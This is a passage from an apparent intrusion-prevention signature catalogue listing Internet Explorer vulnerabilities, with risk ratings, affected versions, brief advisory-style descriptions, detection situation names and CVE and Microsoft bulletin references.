Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1752
File-Text_Suspicious-AutoDetect-Command
References:
CVE-2015-1752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1752
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-1766

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-1766
References:
CVE-2015-1766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1766
MS15-056
http://technet.microsoft.com/security/bulletin/MS15-056
Back to top

Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7
Software: Internet Explorer 10.0
Type: Malfunction
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release
References:
CVE-2015-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2372
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release
References:
CVE-2015-2383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2383
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7
Software: Internet Explorer 9.0
Type: Malfunction
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer
References:
CVE-2015-2388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2388
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free
References:
CVE-2015-2389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2389
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A vulnerability exists in Microsoft Internet Explorer which allows for remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free
References:
CVE-2015-2390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2390
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7
Software: Internet Explorer 9.0
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free
References:
CVE-2015-2391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2391
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption
References:
CVE-2015-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in jscript9.dll when handling certain objects in memory. A remote attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption
References:
CVE-2015-2419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8.1; Windows 10.0; Windows 2008 R2; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption
References:
CVE-2015-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2443
MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079
Back to top

Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 8; Windows 7; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2003; Windows 2012; Windows 2012 R2
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker could exploit these vulnerabilities by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free
References:
CVE-2015-2444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2444
MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079
Back to top

Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption
References:
CVE-2015-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2446
MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079
Back to top

Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. This can lead to arbitrary code execution in the context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption
References:
CVE-2015-2487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2487
MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094
Back to top

Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption
References:
CVE-2015-6042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6042
MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106
Back to top

Microsoft-Internet-Explorer-CVE-2015-6065

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote, unauthenticated attacker can use this to execute arbitrary code in the context of the target user.
Situation: File-Text_Internet-Explorer-CVE-2015-6065
References:
CVE-2015-6065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6065
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Internet-Explorer-CVE-2015-6066

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2015-6066
References:
CVE-2015-6066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6066
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Internet-Explorer-CVE-2015-6068

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2015-6068
References:
CVE-2015-6068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6068
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Internet-Explorer-CVE-2015-6070

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2015-6070
References:
CVE-2015-6070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6070
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption
References:
CVE-2015-6071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6071
MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112
Back to top

Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption
References:
CVE-2015-6075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6075
MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112
Back to top

Microsoft-Internet-Explorer-CVE-2015-6076

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Low
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2015-6076
References:
CVE-2015-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6076
MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113
Back to top

Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption
References:
CVE-2015-6136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6136
MS15-126
http://technet.microsoft.com/security/bulletin/MS15-126
Back to top

Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker could use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption
References:
CVE-2016-3288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3288
MS16-095
http://technet.microsoft.com/security/bulletin/MS16-095
Back to top

Microsoft-Internet-Explorer-CVE-2016-3289

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2016-3289
References:
CVE-2016-3289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3289
MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096
Back to top

Microsoft-Internet-Explorer-CVE-2016-3293

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2016-3293
References:
CVE-2016-3293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3293
MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096
Back to top

Microsoft-Internet-Explorer-CVE-2016-3327

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Situation: File-Flash_Microsoft-Internet-Explorer-CVE-2016-3327
File-Text_Microsoft-Internet-Explorer-CVE-2016-3327
References:
CVE-2016-3327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3327
MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096
Back to top

Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer. A remote attacker can use this to gain access to sensitive information.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2017-0008-Information-Disclosure
References:
CVE-2017-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0008
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-CVE-2017-0018

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Internet-Explorer-CVE-2017-0018
References:
CVE-2017-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0018
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-CVE-2017-0037

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Internet-Explorer-CVE-2017-0037
References:
CVE-2017-0037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-CVE-2017-0154

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Internet-Explorer-CVE-2017-0154
References:
CVE-2017-0154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0154
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-CVE-2018-8629

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page or document. Successful exploitation, in the worst case, could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-CVE-2018-8631
References:
CVE-2018-8631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631
Back to top

Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure

About this vulnerability: A Microsoft Internet Explorer CWigglyShape Information Disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer, versions 9, 10, and 11, which allows remote attackers to disclose information that can be used to circumvent Address Space Layout Randomization in Windows, due to the improper access of objects in memory.
Situation: File-Text_Microsoft-Internet-Explorer-CWigglyShape-Information-Disclosure
References:
CVE-2016-7283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7283
Back to top

Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
HTTP_SHS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
References:
CVE-2009-1547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1547
BID-36622
http://www.securityfocus.com/bid/36622
MS09-054
http://technet.microsoft.com/security/bulletin/MS09-054
Back to top

Microsoft-Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error when accessing an XML Data Source Object that has not been deleted properly. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption
References:
CVE-2011-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0035
BID-46157
http://www.securityfocus.com/bid/46157
OSVDB-70831
http://www.osvdb.org/70831
MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003
Back to top

Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-CVE-2012-1874
References:
CVE-2012-1874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1874
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There exists a remote code execution vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Developer-Toolbar-Use-After-Free
References:
CVE-2012-1874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1874
OSVDB-82864
http://www.osvdb.org/82864
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Developer-Tools-CVE-2010-0811

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811
File-Text_Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811
References:
CVE-2010-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0811
MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027
Back to top

Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution

About this vulnerability: A code execution vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer. The flaw is due to improper validation with buffers when handling specific DHTML methods. This allows code execution in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
File-Text_Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
References:
CVE-2005-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0555
BID-12427
http://www.securityfocus.com/bid/12427
MS05-014
http://technet.microsoft.com/security/bulletin/MS05-014
Back to top

Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting

About this vulnerability: A cross-site scripting vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-188-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Microsoft Internet Explorer. The DHTML Edit Control ActiveX control in Internet Explorer does not enforce the same origin policy for the scripts it executes. This may allow arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
File-Text_Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
References:
CVE-2004-1319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1319
BID-11950
http://www.securityfocus.com/bid/11950
MS05-013
http://technet.microsoft.com/security/bulletin/MS05-013
Back to top

Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles the switching of page location. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system in the context of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
References:
CVE-2007-5347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5347
BID-26427
http://www.securityfocus.com/bid/26427
MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069
Back to top

Microsoft-Internet-Explorer-DOM-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an error in the handling of certain DOM objects. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behavior of the target host depends on the intended function of the injected code. The injected code is executes in the security context of the currently logged in user. In an unsucessful attack, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption
References:
CVE-2010-1259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1259
BID-40410
http://www.securityfocus.com/bid/40410
OSVDB-65215
http://www.osvdb.org/65215
MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035
Back to top

Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
